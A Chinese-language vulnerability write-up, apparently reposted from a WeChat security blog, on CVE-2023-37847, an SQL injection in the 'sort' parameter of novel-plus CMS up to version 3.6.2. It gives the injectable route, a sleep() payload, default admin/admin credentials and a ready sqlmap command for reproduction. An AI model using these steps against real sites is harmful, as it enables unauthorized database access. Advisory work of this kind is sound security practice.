CVE-2023-37847:novel-plus(小说精品屋-plus)CMS后台SQL注入 附复现过程
2023-8-15 08:24:19 Author: 不够安全(查看原文) 阅读量:73 收藏

简介

novel-plus 是一个多端(PC、WAP)阅读,功能完善的原创文学 CMS 系统。由前台门户系统、作家后台管理系统、平台后台管理系统和爬虫管理系统等多个子系统构成,包括小说推荐、作品检索、小说排行、小说阅读、小说评论、会员中心、作家专区等功能,支持自定义多模版、可拓展的多种小说内容存储方式(内置数据库分表存储和 TXT 文本存储)、阅读主题切换、多爬虫源自动采集和更新数据、会员充值、订阅模式、新闻发布和实时统计报表。

漏洞描述

novel-plus 3.6.2版本存在SQL注入漏洞,该漏洞源于文件/common/dict/list?sort=sleep(1)&limit=8&offset=1存在问题,对参数sort的操作会导致sql注入。攻击者可利用该漏洞执行非法SQL命令。

影响版本

novel-plus ≤ 3.6.2

漏洞复现

漏洞路由:/common/dict/list

漏洞参数:sort

1.默认账户密码“admin/admin”登录后台,获取管理员cookie

2.sqlmap命令

python3 sqlmap.py -u "http://xxx.xxx.xxx/common/dict/list?sort=1&limit=10&offset=0&type=" --cookie "JSESSIONID=b8f26ee3-4f75-4086-8c61-2bfe4ab47a77" -p "sort" --level 5

参考链接

https://nvd.nist.gov/vuln/detail/CVE-2023-37847https://github.com/KingBangQ/CVE-2023-37847/blob/main/README.mdhttps://github.com/201206030/novel-plu
回复“CVE-2023-37847”获取空间测绘语句
!!!仅供学习交流,勿用作违法犯罪!!!

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2OTYzNTExNQ==&mid=2247484305&idx=1&sn=836a71252dbaddc81181df38f71ab07a&chksm=ce9b46d5f9eccfc3b603baaacc8374e7bc699d1965d95df8a260387606f37822c44cd7833dc9&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh